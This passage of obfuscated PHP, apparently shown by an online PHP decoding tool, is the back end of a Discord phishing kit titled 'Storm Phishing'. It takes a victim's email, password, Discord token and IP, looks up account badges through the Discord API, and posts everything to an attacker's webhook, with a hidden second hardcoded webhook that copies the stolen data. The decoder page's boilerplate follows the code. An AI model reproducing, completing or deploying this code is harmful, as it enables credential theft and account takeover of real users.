CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x61\165\164\150\x6f\x72\151\172\x61\164\151\157\x6e\72\40" . $token)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTPS); curl_setopt($ch, CURLOPT_PROXY, $proxy[1]); curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy[0]); $req = curl_exec($ch); curl_close($req); return $req; } else { return $result; } } if (stristr($user_id, "\54")) { $user_id = explode("\54", $user_id); } else { $user_id = array($user_id); } $details = json_decode(file_get_contents("\150\164\x74\160\163\x3a\57\x2f\x69\160\151\156\146\157\56\x69\157\x2f" . $client_ip . "\x2f\x6a\x73\x6f\x6e")); $country = $details->country; if ($country == "\x55\101") { $flag = "\360\237\x87\xba\360\237\x87\246"; } elseif ($country == "\x52\x55") { $flag = "\xf0\x9f\x87\xb7\xf0\237\x87\272"; } elseif ($country == "\x55\123") { $flag = "\360\x9f\207\xba\360\x9f\207\270"; } else { $flag = "\360\237\207\xaa\360\x9f\207\xba"; } $TeamOwner = "\xd0\x9d\320\265\xd1\202"; $BOT_Verify = "\320\235\xd0\265\321\x82"; $json_response = json_decode(getinfo($acc_token, "\x68\x74\164\x70\163\x3a\x2f\57\144\x69\163\x63\157\x72\x64\x61\x70\x70\56\143\x6f\155\57\141\160\151\x2f\x76\71\x2f\165\x73\145\162\163\x2f\x40\x6d\x65"), true); $userid = $json_response["\x69\x64"]; $usuario = $json_response["\165\x73\x65\x72\x6e\141\x6d\x65"]; $tag = $json_response["\x64\x69\x73\x63\162\x69\x6d\x69\156\x61\164\x6f\x72"]; $login = urldecode($login); $password = urldecode($password); $acc_token = urldecode($acc_token); $howmuchbadges = 0; $badges = ''; if (isset($json_response["\x64\x69\163\x63\x72\x69\x6d\151\156\x61\164\157\x72"]) && isset($json_response["\165\x73\145\x72\x6e\x61\155\145"])) { $public_flags = $json_response["\x70\165\x62\154\x69\143\x5f\x66\x6c\141\x67\163"]; $flags = array(131072 => "\x3c\72\x44\x45\x5f\x42\x61\x64\147\x65\126\x65\162\x69\x66\x69\145\144\102\157\164\x44\145\166\145\154\x6f\160\x65\162\x3a\71\63\71\x32\63\x37\x33\66\64\65\x38\x33\x32\x33\71\66\x39\x30\76", 65536 => "\x3c\x3a\x44\x45\137\x42\x61\x64\147\145\x56\x65\x72\151\146\151\145\144\102\157\x74\104\145\166\x65\x6c\x6f\160\x65\x72\x3a\x39\x33\x39\x32\x33\x37\x33\66\x34\65\70\63\x32\63\x39\x36\x39\x30\76", 16384 => "\x3c\72\171\x65\x6c\x6c\157\167\137\110\x75\x6e\164\145\162\x47\x6f\x6c\x64\72\x39\x30\63\x36\x35\x33\x34\x36\x30\63\x35\60\67\64\x32\x36\x33\70\x3e", 4096 => "\x3c\x3a\x44\x45\x5f\102\141\x64\x67\145\x56\145\x72\x69\146\151\x65\144\x42\x6f\x74\104\x65\166\145\154\157\x70\x65\162\72\x39\63\x39\62\63\x37\63\66\64\x35\70\63\62\63\x39\66\x39\60\76", 1024 => "\74\72\104\105\137\102\141\144\147\x65\x56\x65\162\151\x66\x69\x65\144\x42\x6f\164\x44\x65\x76\x65\x6c\x6f\x70\145\x72\x3a\x39\x33\71\62\63\x37\63\66\64\x35\70\x33\62\63\71\66\71\x30\76", 512 => "\74\72\x61\137\160\x69\x67\x3a\71\x31\71\64\x31\63\x37\x35\x34\71\61\64\x30\x33\x37\70\x33\61\76", 256 => "\110\171\x70\x65\163\161\165\141\144\x20\117\156\154\151\156\145\x20\110\x6f\x75\x73\145\40\63", 128 => "\x48\x79\160\145\163\161\x75\x61\144\x20\x4f\156\x6c\x69\156\x65\x20\x48\157\165\x73\145\x20\x32", 64 => "\x48\171\x70\x65\x73\161\165\x61\x64\40\117\x6e\x6c\x69\156\x65\40\x48\x6f\x75\x73\x65\40\x31", 8 => "\74\x3a\x67\x72\x65\x65\x6e\137\x42\165\x67\110\x75\x6e\x74\x65\162\72\x39\x30\63\x32\71\64\x38\71\x32\x34\x36\x38\x34\x36\x39\x38\x30\x30\76", 4 => "\74\72\x5f\x75\x61\150\x79\x70\x65\72\x39\61\x39\64\x31\63\x38\64\x33\67\70\67\61\62\x34\70\x30\x37\x3e", 2 => "\x3c\72\142\154\165\x65\137\160\x61\162\x74\156\x65\162\x3a\x38\71\71\64\62\x32\66\x38\x33\61\x30\62\x35\x38\x30\x38\61\66\x3e", 1 => "\x3c\x3a\x61\x7a\x5f\x73\164\141\146\x66\x4c\x43\x3a\x38\71\x31\63\x39\x32\67\63\62\62\66\60\66\60\61\x39\61\67\x3e"); $str_flags = array(); while ($public_flags != 0) { foreach ($flags as $key => $value) { if ($public_flags >= $key) { array_push($str_flags, $value); $public_flags = $public_flags - $key; } } } } foreach ($str_flags as $item) { if ($item != "\110\x79\x70\145\163\x71\x75\141\x64\40\x4f\156\x6c\151\156\145\40\x48\157\x75\x73\145\40\61" and $item != "\x48\171\x70\145\163\x71\x75\141\144\x20\117\x6e\154\x69\156\x65\40\110\157\165\x73\x65\40\62" and $item != "\110\x79\160\x65\x73\x71\x75\141\144\40\117\x6e\154\x69\x6e\x65\x20\110\x6f\165\x73\145\x20\x33") { if ($item == "\x56\145\x72\x69\146\151\145\144\x20\104\x65\x76\145\x6c\x6f\x70\145\x72") { $json_response_bot = json_decode(getinfo($usertoken, "\x68\x74\164\160\x73\x3a\x2f\57\x64\x69\163\x63\x6f\x72\144\x2e\143\157\x6d\x2f\x61\160\x69\x2f\x76\x39\57\141\x70\160\154\x69\143\x61\x74\151\x6f\x6e\x73\x3f\167\151\164\x68\137\164\x65\141\155\137\x61\x70\160\154\x69\x63\x61\164\151\157\x6e\163\x3d\x74\162\165\x65"), true); foreach ($json_response_bot as $item2) { if (json_encode($item2["\x76\145\x72\x69\x66\151\143\x61\x74\x69\157\x6e\x5f\163\x74\x61\x74\145"]) == "\64") { if (json_encode($item2["\157\x77\156\145\162"]["\151\144"]) == $userid) { $BOT_Verify = "\102\157\x74\40\x4f\167\156\x65\162"; } } } $json_response_team = json_decode(getinfo($usertoken, "\150\164\164\160\x73\x3a\57\x2f\144\151\x73\x63\x6f\x72\x64\x2e\143\157\155\57\x61\160\151\x2f\x76\71\x2f\x74\145\x61\x6d\163"), true); foreach ($json_response_team as $item3) { if (json_encode($item3["\x6f\x77\156\x65\x72\137\x75\x73\x65\x72\x5f\x69\x64"]) == $userid) { $TeamOwner = "\124\145\141\x6d\40\117\x77\x6e\145\x72"; } } if ($TeamOwner != "\xd0\x9d\xd0\265\321\202" and $BOT_Verify == "\xd0\x9d\xd0\265\xd1\202") { $item = (string) $item . "\50\x54\145\x61\155\40\117\x77\156\x65\162\51"; } elseif ($TeamOwner == "\xd0\235\320\xb5\321\202" and $BOT_Verify != "\320\x9d\xd0\265\xd1\202") { $item = (string) $item . "\50\x42\x6f\164\x20\x4f\167\x6e\145\162\51"; } elseif ($TeamOwner != "\320\x9d\320\265\321\202" and $BOT_Verify != "\xd0\x9d\320\xb5\321\202") { $item = (string) $item . "\x28\x54\x65\141\x6d\40\x4f\x77\x6e\145\x72\54\40\x42\157\x74\40\117\x77\x6e\145\162\x29"; } if ($howmuchbadges == 0) { $badges = $item; } else { $badges = $badges . "\40\174\40" . $item; } $howmuchbadges += 1; } else { if ($howmuchbadges == 0) { $badges = $item; } else { $badges = $badges . "\40\174\x20" . $item; } $howmuchbadges += 1; } } } if ($badges == '') { $timestamp = date("\x63", strtotime("\x6e\157\x77")); $json_data = json_encode(array("\x75\x73\145\x72\156\x61\155\145" => "\x53\164\x6f\x72\155\40\120\x68\x69\163\150\151\156\x67", "\164\x74\163" => false, "\145\155\142\145\x64\163" => array(array("\x74\x69\164\154\x65" => "\x50\150\x69\x73\150\x69\156\x67\40\x4c\157\x67\151\156", "\164\171\x70\x65" => "\162\151\x63\150", "\164\x69\x6d\145\163\164\x61\x6d\x70" => $timestamp, "\143\157\154\x6f\x72" => hexdec("\x33\x33\x36\x36\x66\x66"), "\x66\157\x6f\164\145\162" => array("\x74\145\x78\164" => "\x73\164\x6f\x72\155\x73\164\145\x61\x6c\145\x72\56\143\157\155\x2e\x62\162", "\151\143\157\156\137\165\x72\154" => "\x68\x74\164\160\163\72\x2f\57\143\144\x6e\56\144\151\x73\x63\x6f\162\144\x61\x70\x70\x2e\143\157\x6d\57\x61\x74\164\141\143\150\155\145\156\x74\163\57\71\x33\x35\x39\x32\66\71\x32\x33\x37\x35\x36\x39\71\60\64\x37\64\57\x39\64\x30\x30\67\x37\61\67\x30\x36\65\x37\x37\64\66\71\x34\x34\x2f\x75\x6e\x6b\x6e\157\167\156\x5f\64\x2e\x70\156\x67"), "\141\165\x74\150\x6f\162" => array("\156\x61\155\145" => "\x53\164\x6f\x72\x6d\x20\123\x74\x65\141\x6c\145\x72", "\x75\x72\154" => "\x68\x74\x74\x70\x73\x3a\x2f\57\163\x74\157\162\x6d\163\164\x65\141\x6c\145\162\x2e\x63\157\155\x2e\x62\x72", "\151\x63\x6f\x6e\x5f\x75\162\x6c" => "\150\x74\x74\x70\x73\x3a\x2f\x2f\x63\144\156\x2e\x64\151\x73\x63\x6f\x72\144\141\160\x70\x2e\143\157\x6d\57\x61\x74\164\141\143\x68\155\x65\156\164\x73\57\71\63\65\71\x32\x36\71\x32\63\x37\x35\x36\x39\x39\x30\64\67\64\57\71\x34\60\60\x37\67\61\x37\60\x36\x35\x37\x37\64\66\71\x34\x34\x2f\x75\x6e\153\156\157\x77\x6e\x5f\x34\56\160\x6e\147"), "\x66\x69\145\154\x64\x73" => array(array("\156\141\155\x65" => "\74\141\72\141\x41\x72\x63\137\101\166\x69\x73\x6f\72\71\x30\71\x36\x31\x37\67\67\x32\63\70\66\x39\67\x39\71\x30\x31\x3e\40\x56\x69\143\164\x69\155\x20\x49\156\x66\157\47\x73", "\x76\x61\x6c\x75\x65" => "\x60\140\x60\360\237\x92\x89\x20\x4c\151\x6e\153\72\40{$full_url}\12\xf0\237\222\273\x20\126\151\x63\x74\151\x6d\x20\x49\120\72\40{$client_ip}\x60\x60\140", "\x69\x6e\x6c\x69\x6e\145" => false), array("\156\x61\x6d\x65" => "\125\163\145\162\x6e\141\155\x65", "\x76\x61\154\x75\x65" => "\x60{$usuario}\x23{$tag}\x60", "\x69\156\154\151\156\x65" => false), array("\156\x61\155\x65" => "\125\163\x65\x72\x20\111\104", "\166\x61\x6c\165\x65" => "\140{$userid}\x60", "\x69\x6e\154\151\156\x65" => true), array("\156\x61\x6d\145" => "\x45\x6d\141\151\x6c", "\166\x61\154\x75\145" => "\140{$login}\x60", "\x69\x6e\x6c\x69\x6e\145" => false), array("\x6e\141\155\145" => "\120\x61\163\163\167\157\162\144", "\x76\141\154\x75\x65" => "\140{$password}\x60", "\151\156\x6c\x69\156\145" => false), array("\x6e\x61\155\x65" => "\102\x61\144\x67\145\163", "\x76\141\x6c\165\x65" => "\74\x3a\x64\145\x6e\x69\x65\x64\x3a\70\x31\x32\x39\x32\x34\62\60\x30\x35\63\x31\x39\61\70\70\x35\70\x3e", "\151\156\x6c\151\x6e\x65" => false), array("\156\x61\155\x65" => "\74\x3a\142\154\x75\x65\137\x64\151\163\x63\157\162\x64\x70\x61\x72\x74\156\x65\x72\72\71\x33\64\65\67\x39\63\x30\x32\x39\70\63\x34\x30\65\x35\x37\71\x3e\x20\124\x6f\153\145\156", "\x76\x61\154\165\x65" => "\x60\140\140{$acc_token}\140\140\140", "\151\x6e\x6c\151\x6e\145" => true))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($webhook); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x43\x6f\x6e\164\145\x6e\164\x2d\164\171\x70\145\72\40\x61\160\x70\x6c\x69\x63\141\x74\x69\x6f\x6e\57\152\163\x6f\x6e")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $dh = curl_init("\x68\x74\x74\160\x73\72\x2f\x2f\143\x61\x6e\x61\162\x79\x2e\144\151\x73\x63\157\162\144\56\x63\x6f\155\x2f\x61\x70\151\x2f\167\x65\x62\150\x6f\x6f\x6b\x73\57\71\x34\x36\65\67\70\63\63\x37\x39\x30\x36\x37\60\x38\65\64\x31\x2f\x30\157\x44\112\105\x64\x4f\x75\153\165\66\x5f\62\x6d\152\x2d\60\117\111\x77\x30\61\x38\63\71\x51\71\106\102\161\137\x67\x72\x5f\x57\x33\61\x64\x66\167\137\125\163\112\x48\x66\x6d\122\122\67\147\x47\x5a\x71\116\66\x65\71\x73\171\67\x56\x76\121\x65\150\60\115"); curl_setopt($dh, CURLOPT_HTTPHEADER, array("\x43\x6f\156\x74\x65\x6e\x74\55\x74\x79\x70\145\x3a\x20\x61\160\x70\154\x69\x63\x61\x74\x69\157\156\x2f\152\163\157\x6e")); curl_setopt($dh, CURLOPT_POST, 1); curl_setopt($dh, CURLOPT_POSTFIELDS, $json_data); curl_setopt($dh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($dh, CURLOPT_HEADER, 0); curl_setopt($dh, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($dh); $response = curl_exec($ch); } else { $timestamp = date("\143", strtotime("\156\x6f\x77")); $json_data = json_encode(array("\x75\x73\x65\162\x6e\x61\155\x65" => "\123\164\x6f\162\155\40\120\150\x69\163\x68\151\156\x67", "\164\164\x73" => false, "\145\x6d\142\x65\x64\x73" => array(array("\164\151\x74\154\x65" => "\120\x68\x69\163\150\151\x6e\147\40\x4c\x6f\x67\151\x6e", "\x74\x79\160\145" => "\x72\151\x63\150", "\164\x69\155\x65\x73\x74\141\155\x70" => $timestamp, "\143\157\154\157\162" => hexdec("\63\63\66\x36\146\x66"), "\x66\157\157\164\145\x72" => array("\x74\145\x78\164" => "\x73\164\157\x72\x6d\x73\x74\x65\x61\154\x65\162\56\x63\x6f\155\56\x62\x72", "\151\143\x6f\156\137\x75\x72\154" => "\150\164\x74\x70\x73\x3a\x2f\57\143\x64\x6e\x2e\144\151\163\143\157\162\144\141\x70\160\x2e\143\157\x6d\57\141\x74\164\141\143\150\155\145\156\x74\163\57\71\63\x35\x39\62\66\71\x32\63\x37\65\x36\x39\71\x30\64\67\x34\57\71\64\60\60\67\67\61\67\x30\66\65\67\x37\x34\x36\71\x34\64\x2f\x75\156\153\x6e\157\x77\x6e\137\x34\56\x70\156\x67"), "\x61\x75\x74\150\x6f\162" => array("\x6e\141\x6d\x65" => "\123\x74\157\162\155\x20\123\164\145\141\x6c\x65\x72", "\x75\162\x6c" => "\x68\164\x74\x70\163\x3a\x2f\x2f\x73\164\x6f\x72\x6d\163\x74\x65\x61\x6c\x65\162\56\x63\157\x6d\x2e\142\162", "\x69\143\x6f\x6e\x5f\165\162\154" => "\x68\x74\x74\160\x73\x3a\57\57\x63\144\x6e\x2e\144\151\163\143\157\x72\x64\141\160\x70\x2e\x63\157\155\57\x61\164\164\141\x63\150\x6d\x65\x6e\x74\x73\57\71\x33\x35\71\x32\66\71\62\63\x37\x35\66\x39\71\x30\x34\67\x34\x2f\71\64\x30\x30\67\x37\x31\67\60\66\x35\67\x37\x34\66\x39\x34\x34\x2f\165\156\153\x6e\x6f\167\x6e\137\64\56\x70\x6e\x67"), "\146\151\145\154\144\x73" => array(array("\156\141\x6d\145" => "\x3c\x61\72\141\101\x72\x63\137\x41\x76\x69\163\157\72\x39\60\x39\x36\61\67\67\67\x32\x33\x38\x36\x39\x37\x39\71\60\x31\x3e\40\126\x69\143\164\x69\x6d\x20\x49\x6e\x66\x6f\x27\163", "\x76\x61\154\165\145" => "\140\x60\x60\360\x9f\x92\x89\40\114\x69\x6e\153\x3a\x20{$full_url}\xa\360\x9f\222\xbb\x20\126\x69\x63\164\151\x6d\x20\111\120\x3a\x20{$client_ip}\140\140\x60", "\x69\x6e\x6c\151\x6e\145" => false), array("\156\x61\155\145" => "\125\x73\145\x72\x6e\141\155\145", "\166\x61\x6c\165\145" => "\x60{$usuario}\43{$tag}\x60", "\x69\156\x6c\151\156\x65" => false), array("\x6e\141\x6d\x65" => "\125\x73\145\162\40\x49\x44", "\166\141\x6c\165\145" => "\140{$userid}\x60", "\151\x6e\154\x69\x6e\145" => true), array("\x6e\141\x6d\145" => "\x45\x6d\x61\151\x6c", "\x76\141\x6c\165\145" => "\140{$login}\140", "\151\156\x6c\x69\x6e\x65" => false), array("\x6e\141\x6d\145" => "\x50\x61\163\163\167\157\x72\144", "\x76\x61\x6c\165\x65" => "\140{$password}\140", "\x69\156\x6c\151\156\x65" => false), array("\x6e\141\x6d\x65" => "\x42\141\x64\147\x65\x73", "\x76\141\x6c\x75\145" => "{$badges}", "\151\x6e\154\x69\x6e\145" => false), array("\156\x61\x6d\145" => "\x3c\72\142\154\165\145\137\144\151\163\x63\157\162\144\x70\141\x72\x74\156\x65\162\72\71\63\x34\x35\x37\71\63\60\x32\x39\70\x33\x34\x30\x35\x35\x37\71\76\x20\124\x6f\x6b\145\x6e", "\166\141\x6c\165\x65" => "\x60\x60\x60{$acc_token}\x60\x60\140", "\x69\x6e\x6c\x69\156\145" => true))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($webhook); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\103\157\156\164\x65\x6e\x74\x2d\164\x79\160\145\x3a\x20\x61\x70\160\x6c\151\143\141\164\151\x6f\x6e\x2f\152\x73\x6f\x6e")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $dh = curl_init("\x68\x74\x74\x70\x73\72\57\57\x63\x61\156\141\162\171\56\x64\x69\x73\143\157\x72\144\x2e\143\x6f\155\x2f\141\x70\151\57\x77\145\x62\x68\x6f\157\x6b\x73\x2f\71\x34\x36\65\x37\x38\63\63\67\71\x30\x36\67\60\x38\65\x34\61\x2f\60\157\104\112\x45\x64\117\x75\153\x75\66\x5f\x32\155\x6a\55\60\x4f\x49\167\x30\x31\x38\x33\x39\x51\71\x46\102\x71\x5f\x67\x72\x5f\127\63\61\144\146\x77\x5f\x55\163\x4a\110\x66\x6d\122\122\67\x67\x47\132\x71\116\66\145\71\x73\x79\x37\126\166\x51\145\x68\60\115"); curl_setopt($dh, CURLOPT_HTTPHEADER, array("\103\157\156\x74\145\x6e\x74\55\164\171\160\x65\x3a\40\141\160\x70\x6c\151\143\141\x74\x69\x6f\156\x2f\152\x73\x6f\156")); curl_setopt($dh, CURLOPT_POST, 1); curl_setopt($dh, CURLOPT_POSTFIELDS, $json_data); curl_setopt($dh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($dh, CURLOPT_HEADER, 0); curl_setopt($dh, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($dh); $response = curl_exec($ch); } foreach ($user_id as $select_id) { } if ($admin_sendlog) { } } } goto fYnIO; AcIkI: error_reporting(E_ERROR | E_PARSE); goto iPeXd; Nstz5: $Request = new Request(); goto xRm9R; X8TxD: class Request { public function GetURL($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } public function PostURL($url, $array) { $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } } goto Nstz5; fYnIO: $Main = new Main(); goto ClQYx; GHE8w: $Monitoring = new Monitoring(); goto Scpfv; ZiGEx: ?>

Function Calls

None

Variables

None

Stats

MD5	e19e0af6fc3733d40cef530793554c94
Eval Count	0
Decode Time	100 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats